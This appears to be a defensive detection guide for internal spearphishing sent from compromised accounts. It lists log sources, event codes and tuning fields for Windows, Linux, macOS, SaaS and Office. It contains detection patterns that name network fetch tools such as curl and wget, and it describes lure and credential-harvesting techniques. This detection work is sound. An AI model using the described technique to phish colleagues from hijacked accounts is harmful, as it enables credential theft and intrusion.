Sequence of internal email sent from a recently compromised user account (preceded by abnormal logon or device activity), with attachments or links leading to execution or credential harvesting. Defender observes: internal mail delivery to peers with high entropy attachments, followed by click events, process initiation, or credential prompts.
| Data Component | Name | Channel |
|---|---|---|
| Logon Session Creation (DC0067) | WinEventLog:Security | EventCode=4624 |
| User Account Authentication (DC0002) | WinEventLog:Security | EventCode=4625 |
| Logon Session Metadata (DC0088) | WinEventLog:Security | EventCode=4672 |
| Application Log Content (DC0038) | m365:unified | SendOnBehalf, MessageSend, ClickThrough, MailItemsAccessed |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Field | Description |
|---|---|
| TimeWindow | Expected time between internal email and link execution or file dropper |
| UserContext | Baseline logon locations and device usage for sender accounts |
| AttachmentEntropyThreshold | Entropy value over which attachment is considered suspicious |
Delivery of suspicious internal communication (e.g., Thunderbird, Evolution) using compromised internal accounts. Sequence of: unexpected user activity + mail transfer logs + download or execution of attachments.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |
| Application Log Content (DC0038) | Application:Mail | smtpd$.*$: .*from=[.*@internaldomain.com](mailto:.*@internaldomain.com) to=[.*@internaldomain.com](mailto:.*@internaldomain.com) |
| Network Traffic Content (DC0085) | linux:syslog | curl|wget|python .*http |
| Field | Description |
|---|---|
| SubjectLineAnomaly | Deviation from typical internal email subjects |
| AttachmentType | Executable types allowed or flagged by mail relay |
Abnormal Apple Mail use, including internal email relays followed by file execution or script events (e.g., attachments launched via Preview, terminal triggered from Mail.app)
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:unifiedlog | com.apple.mail.* exec.* |
| Network Traffic Content (DC0085) | macos:unifiedlog | curl|osascript.*open location |
| Field | Description |
|---|---|
| ExecutionChainDepth | Number of child processes stemming from Mail.app |
| MailScriptFlag | Toggle on scripting detection within mail context |
Internal spearphishing via SaaS applications (e.g., Slack, Teams, Gmail): message sent from compromised user with attachment or URL, followed by click and credential access behavior.
| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | saas:slack | file_upload, message_send, message_click |
| Field | Description |
|---|---|
| UserAnomalyThreshold | Volume or timing of messages sent after compromise |
| FileRiskScoring | Whether SaaS DLP assigns risk scores to attachments |
Outlook or Word used to forward suspicious internal attachments with macro content. Defender observes attachment forwarding, auto-opening behaviors, or macro prompt interactions.
| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | m365:unified | SendOnBehalf, MessageSend, AttachmentPreviewed |
| Command Execution (DC0064) | WinEventLog:Security | EventCode=4104 |
| Field | Description |
|---|---|
| MacroExecutionWindow | Timing between mail open and macro invocation |
| AttachmentNameHeuristics | Patterns of known internal spearphishing lures (e.g., invoice, HR_policy) |